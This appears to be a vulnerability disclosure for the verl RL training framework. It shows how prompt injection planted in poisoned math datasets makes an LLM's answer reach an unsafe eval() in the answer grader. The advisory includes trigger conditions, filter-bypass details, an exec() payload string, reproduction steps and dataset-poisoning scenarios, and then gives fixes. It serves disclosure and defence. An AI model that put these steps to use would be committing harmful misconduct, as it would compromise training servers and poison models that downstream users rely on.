verl math_equal() Arbitrary Code Execution via Unsafe eval()

Basic Information

Field	Details
Vulnerability Name	Indirect Prompt Injection to ACE via Unsafe `eval()` in Math Answer Grading
Vulnerability Type	CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (eval Injection)
Affected Component	`verl/utils/reward_score/prime_math/grader.py` Line 298-301
Affected Versions	verl ≤ 0.7.0 (main branch still affected as of analysis date)
CVSS 3.1	8.1 (High) — `AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H`
GitHub	https://github.com/verl-project/verl

CVSS Score Explanation

Dimension	Value	Rationale
Attack Vector	Network (N)	Attacker triggers remotely by poisoning training datasets, no local access required
Attack Complexity	High (H)	Requires indirectly controlling LLM output format via Prompt Injection, not direct parameter passing
Privileges Required	None (N)	No system authentication required
User Interaction	None (N)	Training/evaluation pipeline triggers automatically, no human intervention needed
Confidentiality	High (H)	Can read training data, model weights, API keys, etc.
Integrity	High (H)	Can tamper with model checkpoints, plant backdoors
Availability	High (H)	Can terminate training processes, destroy compute resources

Vulnerability Description

verl is an open-sou large model reinfoment learning training framework by ByteDance (19k+ Stars), supporting algorithms such as PPO and GRPO. In its math answer scoring module prime_math/grader.py, the math_equal() function is used to compare whether the model-generated answer is equivalent to the ground truth answer.

When the ground truth answer is a matrix type (containing \begin{pmatrix}) and the model's output answer starts with [ and ends with ], the code directly calls Python's built-in eval() function on the model output without any input sanitization or sandbox isolation.

An attacker can use Indirect Prompt Injection (injecting malicious instructions into the training dataset) to induce the LLM to output a string containing malicious Python code when answering matrix-type math problems. This string is extracted by match_answer(), passed into math_equal(), and ultimately executed by eval(), achieving arbitrary code execution (ACE).

Vulnerability SINK

File: verl/utils/reward_score/prime_math/grader.py Line 298-301

elif r"\begin{pmatrix}" in reference and prediction.startswith("[") and prediction.endswith("]"):
    if isinstance(eval(prediction), list):   # ← SINK: directly eval untrusted input
        pred_matrix = eval(prediction)       # ← second eval

Trigger Conditions (all three must be satisfied simultaneously):

reference (ground truth answer) contains \begin{pmatrix} — i.e., a matrix-type math problem
prediction (answer extracted from model) starts with [ and ends with ]
prediction does not contain underscore _ — otherwise handle_base() will truncate during the normalize() phase and throw a ValueError

Call Stack

verl GRPO/PPO Training Loop
  └→ RewardManager.__call__()                    # compute reward score for each rollout
      └→ compute_score(solution_str, ground_truth)  # prime_math/__init__.py
          ├→ match_answer(solution_str)             # extract answer string from LLM output ← SOURCE
          │   └→ locate answer via keyword matching ("answer is", \boxed{} etc.)
          │   └→ return (is_matched, prediction)       # prediction without any security filtering
          └→ math_equal(prediction, reference)       # grader.py Line 174
              └→ normalize(prediction, pi)           # Line 188 — preprocessing
              │   └→ handle_base(prediction)         # detect underscore _ and handle base conversion
              │   └→ handle_pi(prediction, pi)       # detect \pi and replace
              └→ [matrix comparison branch] Line 298-301
                  └→ eval(prediction)                # ← SINK: arbitrary code execution

SOURCE (Data Entry Point)

File: verl/utils/reward_score/prime_math/__init__.py Line 347-386

def match_answer(response):
    is_matched = False
    # extract answer from LLM output via keywords
    for ans_marker in ["answer:", "answer is", "answers are"]:
        ans_idx = response.lower().rfind(ans_marker)
        if ans_idx != -1:
            is_matched = True
            response = response[ans_idx + len(ans_marker):].strip()
    # ... more extraction logic (\boxed{}, "is", "=" etc.) ...

    # require the answer to contain at least one digit
    is_matched = is_matched if any([c.isdigit() for c in response]) else False
    return is_matched, response

The input response to match_answer() comes from the raw output of the LLM model (solution_str). This function only performs text locating and slicing without any security filtering. In a Prompt Injection scenario, an attacker can manipulate problem descriptions in the training data to induce the model to output a malicious string in a specific format.

Exploitation Prerequisites

Condition	Description
Training data contains matrix-type problems	ground_truth must contain `\begin{pmatrix}`; such problems are common in the MATH dataset
LLM output can be controlled	Induce the model via Prompt Injection to output an answer in the `[malicious code]` format
Payload contains no underscore	`handle_base()` splits on `_` causing crashes; must use `exec()` instead of `__import__()`
Payload contains a digit	`match_answer()` line 384 requires at least one digit character in the answer
verl uses prime_math scoring	Requires `data_source` to correspond to MATH dataset or manually specifying the prime_math scoring function

Exploitation Steps

Attack Scenario

An attacker injects a "matrix problem" containing Prompt Injection instructions into a public math dataset. When other researchers use the verl framework for GRPO/PPO training on that dataset, the LLM is induced to output a malicious payload when answering that problem, and verl's scoring function automatically triggers eval() to execute arbitrary code.

Reproduction Flow

Step 1: Attacker crafts a poisoned math problem (containing Prompt Injection)
         ↓
Step 2: Local LLM (Qwen2.5-14B-Instruct) receives the poisoned problem
         ↓
Step 3: LLM is successfully injected, outputs an answer containing malicious code:
        "The answer is [exec("import os; os.system('echo PWNED1 > /tmp/verl-rce-proof.txt')")]"
         ↓
Step 4: verl compute_score() calls match_answer() to extract the answer
         ↓
Step 5: math_equal(prediction, reference) enters the matrix comparison branch
         ↓
Step 6: eval(prediction) executes the malicious code → writes to /tmp/verl-rce-proof.txt
         ↓
Step 7: RCE succeeds, attacker gains code execution on the training server

Proof of Concept

The following PoC has been verified successfully on macOS + Ollama (qwen2.5:14b-instruct) + verl 0.7.0.

Environment Setup

# 1. Install Ollama and pull the model
curl -fsSL https://ollama.com/install.sh | sh
ollama pull qwen2.5:14b-instruct

# 2. Clone verl and install
git clone https://github.com/verl-project/verl.git
cd verl
pip install -e .

PoC Script

POC_CODE

Actual Run Video

POC_VIDEO

SCREENSHOT

Impact Analysis

Direct Impact

Impact	Description
Arbitrary Code Execution	Attacker executes arbitrary system commands on the training/evaluation server
Data Theft	Read sensitive information such as training data, model weights, API keys, cloud credentials
Supply Chain Attack	Tamper with model checkpoints to plant backdoors, affecting all downstream users
Lateral Movement	Training clusters typically have high-privilege network access, can serve as a pivot for internal network penetration

Attack Scenarios

Dataset Poisoning: An attacker injects matrix problems containing Prompt Injection into public math datasets (e.g., MATH, derived versions of GSM8K); triggered when researchers train with verl on that dataset
Malicious Few-Shot: An attacker embeds malicious output templates in few-shot examples to induce the model to generate a payload during the evaluation phase
Adversarial Input: Carefully crafted math problems that use token-level optimization to maximize the probability of the model outputting a malicious payload

Notes on Exploitation Difficulty

Although CVSS rates Attack Complexity as High, actual exploitation is not particularly difficult:

In GRPO training, each prompt generates 8-64 rollouts; triggering requires only one successful hit
In testing, Qwen2.5-14B-Instruct was successfully injected on the first attempt
The exec() payload bypasses handle_base() preprocessing and can reliably reach eval()
Matrix-type problems are common in the MATH dataset; attackers do not need to craft their own ground_truth

Remediation Recommendations

Short-Term Fix (Recommended, One-Line Change)

Replace eval() with ast.literal_eval(), which only allows parsing Python literals:

import ast

# grader.py Line 298-301, before fix:
elif r"\begin{pmatrix}" in reference and prediction.startswith("[") and prediction.endswith("]"):
    if isinstance(eval(prediction), list):        # ← dangerous
        pred_matrix = eval(prediction)            # ← dangerous

# After fix:
elif r"\begin{pmatrix}" in reference and prediction.startswith("[") and prediction.endswith("]"):
    try:
        parsed = ast.literal_eval(prediction)     # ← safe: only accepts literals
        if isinstance(parsed, list):
            pred_matrix = parsed
            # ... subsequent comparison logic ...
    except (ValueError, SyntaxError):
        pass

ast.literal_eval() only accepts Python literals such as strings, numbers, lists, and dictionaries, and will not execute arbitrary code.

Long-Term Recommendations

Global audit of eval() / exec() calls: The handle_pi() function in grader.py (Line 82) also contains an eval() call; although wrapped with contextlib.suppress(Exception), it should still be replaced
Input validation allowlist: Add format validation at the output stage of match_answer(), only allowing mathematical expression characters (digits, operators, brackets, commas)
Sandbox isolation: Sandbox the execution environment of the reward function, restricting access to modules such as os and subprocess
Dependency security scanning: Include eval() usage in CI/CD security checks to prevent new eval injection points from being introduced in subsequent code

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

verl math_equal() Arbitrary Code Execution via Unsafe eval()

Basic Information

CVSS Score Explanation

Vulnerability Description

Vulnerability SINK

Call Stack

SOURCE (Data Entry Point)

Exploitation Prerequisites

Exploitation Steps

Attack Scenario

Reproduction Flow

Proof of Concept

Environment Setup

PoC Script

Actual Run Video

SCREENSHOT

Impact Analysis

Direct Impact

Attack Scenarios

Notes on Exploitation Difficulty

Remediation Recommendations

Short-Term Fix (Recommended, One-Line Change)

Long-Term Recommendations

FilesExpand file tree

verl_rce.md

Latest commit

History

verl_rce.md

File metadata and controls

verl math_equal() Arbitrary Code Execution via Unsafe eval()

Basic Information

CVSS Score Explanation

Vulnerability Description

Vulnerability SINK

Call Stack

SOURCE (Data Entry Point)

Exploitation Prerequisites

Exploitation Steps

Attack Scenario

Reproduction Flow

Proof of Concept

Environment Setup

PoC Script

Actual Run Video

SCREENSHOT

Impact Analysis

Direct Impact

Attack Scenarios

Notes on Exploitation Difficulty

Remediation Recommendations

Short-Term Fix (Recommended, One-Line Change)

Long-Term Recommendations